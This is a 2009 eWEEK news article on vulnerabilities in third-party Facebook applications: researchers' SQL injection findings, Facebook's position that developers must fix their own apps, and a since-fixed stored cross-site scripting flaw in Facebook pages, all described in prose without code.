Close
  • Latest News
  • Artificial Intelligence
  • Video
  • Big Data and Analytics
  • Cloud
  • Networking
  • Cybersecurity
  • Applications
  • IT Management
  • Storage
  • Sponsored
  • Mobile
  • Small Business
  • Development
  • Database
  • Servers
  • Android
  • Apple
  • Innovation
  • Blogs
  • PC Hardware
  • Reviews
  • Search Engines
  • Virtualization
Read Down
Sign in
Close
Welcome!Log into your account
Forgot your password?
Read Down
Password recovery
Recover your password
Close
Search
Logo
Subscribe
Logo
  • Latest News
  • Artificial Intelligence
  • Video
  • Big Data and Analytics
  • Cloud
  • Networking
  • Cybersecurity
  • Applications
  • IT Management
  • Storage
  • Sponsored
  • Mobile
  • Small Business
  • Development
  • Database
  • Servers
  • Android
  • Apple
  • Innovation
  • Blogs
  • PC Hardware
  • Reviews
  • Search Engines
  • Virtualization
More
    Subscribe
    Home Applications
    • Applications
    • Cybersecurity
    • Database
    • Development

    Social Networks Face Security Challenge from Third-Party Applications

    Written by

    Brian Prince
    Published February 18, 2009
    Share
    Facebook
    Twitter
    Linkedin

      eWEEK content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More.

      While changes to Facebook’s user license agreement have been in the news of late, another issue continues to nag Facebook and other social networks-the security of applications developed by third parties.

      The question of what to do with potentially malicious applications created by third parties for use on social networking sites is underscored by the recent findings of security researchers Nir Goldshlager and Rafel Ivgi.

      “The SQL injection we discovered is in two different applications in apps.facebook.com,” explained Goldshlager, who works for Citadel Technologies in Israel. “One of the servers is running as root. This means we can write files into the machine and with a high chance of executing code on it as root. In any case it is possible to obtain the same information about the users, as the application is able to get and insert new and even malicious information into the database.”

      On the subject of Facebook security, officials said fixing third-party applications is up to the developer.

      “Developer applications are hosted on third-party servers,” Ryan McGeehan, of Facebook’s security team, told eWEEK. “When security-related bugs arise in third-party applications-it’s the developer’s responsibility to get them fixed, as their code does not live on Facebook systems.”

      When Facebook receives reports about vulnerabilities in third-party applications, officials notify the developers immediately. In some cases, Facebook also disables or sandboxes applications until the developer has corrected the issue.

      Facebook Users Should Be Wary

      The developers of the two applications referred to by Goldshlager and Ivgi have both been contacted by Facebook, and remediation began immediately, McGeehan said. Neither application should be accessible, and the applications will be reviewed before they are enabled, he added.

      Still, the issue of third-party applications is a sticky one for social networking sites, which by their very nature encourage people to share. If developers aren’t creating secure code, or, worse yet, are intentionally building malicious applications, users could be at risk. To help address this, Facebook requires that developers agree to comply with policy guidelines prohibiting malicious activity before they can build on the site’s platforms.

      “We recommend that users add applications from companies or developers that they trust,” McGeehan said. “This is similar to how we recommend that users only add people they trust in real life. We also recommend that developers follow development standards for Web applications, such as the standards set by the Open Web Application Security Project … to avoid vulnerability. Users can also check out our help page for more information on applications.”

      In addition to the SQL injection bugs, Goldshlager and Ivgi also found a cross-site scripting vulnerability that has since been fixed. That vulnerability was in the Facebook pages mechanism. The duo found that a user can create a new page with arbitrary HTML code in the page’s name.

      The code will only be displayed as text, and will not be exploitable until a new message is created in the discussion section of the page and a reply is made to that message. The first reply to the topic will execute the arbitrary code-which is the page’s name itself-because it does not filter the HTML code, Goldshlager explained. The situation allows hackers to create a permanent XSS situation inside Facebook that can take over the session of any user browsing that page.

      “This is a complex case of input validation in a Web application, since the user’s input is always filtered to avoid executing free HTML code except from the one case of a reply to a topic in that Facebook page with the [malicious] page name,” Goldshlager said. “Facebook fixed the vulnerability by filtering the user input [the page’s name] also in the page where the first topic reply is displayed.”

      Brian Prince
      Brian Prince

      Get the Free Newsletter!

      Subscribe to Daily Tech Insider for top news, trends & analysis

      Get the Free Newsletter!

      Subscribe to Daily Tech Insider for top news, trends & analysis

      MOST POPULAR ARTICLES

      Artificial Intelligence

      9 Best AI 3D Generators You Need...

      Sam Rinko - June 25, 2024 0
      AI 3D Generators are powerful tools for many different industries. Discover the best AI 3D Generators, and learn which is best for your specific use case.
      Read more
      Cloud

      RingCentral Expands Its Collaboration Platform

      Zeus Kerravala - November 22, 2023 0
      RingCentral adds AI-enabled contact center and hybrid event products to its suite of collaboration services.
      Read more
      Artificial Intelligence

      8 Best AI Data Analytics Software &...

      Aminu Abdullahi - January 18, 2024 0
      Learn the top AI data analytics software to use. Compare AI data analytics solutions & features to make the best choice for your business.
      Read more
      Latest News

      Zeus Kerravala on Networking: Multicloud, 5G, and...

      James Maguire - December 16, 2022 0
      I spoke with Zeus Kerravala, industry analyst at ZK Research, about the rapid changes in enterprise networking, as tech advances and digital transformation prompt...
      Read more
      Video

      Datadog President Amit Agarwal on Trends in...

      James Maguire - November 11, 2022 0
      I spoke with Amit Agarwal, President of Datadog, about infrastructure observability, from current trends to key challenges to the future of this rapidly growing...
      Read more
      Logo

      eWeek has the latest technology news and analysis, buying guides, and product reviews for IT professionals and technology buyers. The site’s focus is on innovative solutions and covering in-depth technical content. eWeek stays on the cutting edge of technology news and IT trends through interviews and expert analysis. Gain insight from top innovators and thought leaders in the fields of IT, business, enterprise software, startups, and more.

      Facebook
      Linkedin
      RSS
      Twitter
      Youtube

      Advertisers

      Advertise with TechnologyAdvice on eWeek and our other IT-focused platforms.

      Advertise with Us

      Menu

      • About eWeek
      • Subscribe to our Newsletter
      • Latest News

      Our Brands

      • Privacy Policy
      • Terms
      • About
      • Contact
      • Advertise
      • Sitemap
      • California – Do Not Sell My Information

      Property of TechnologyAdvice.
      © 2024 TechnologyAdvice. All Rights Reserved

      Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.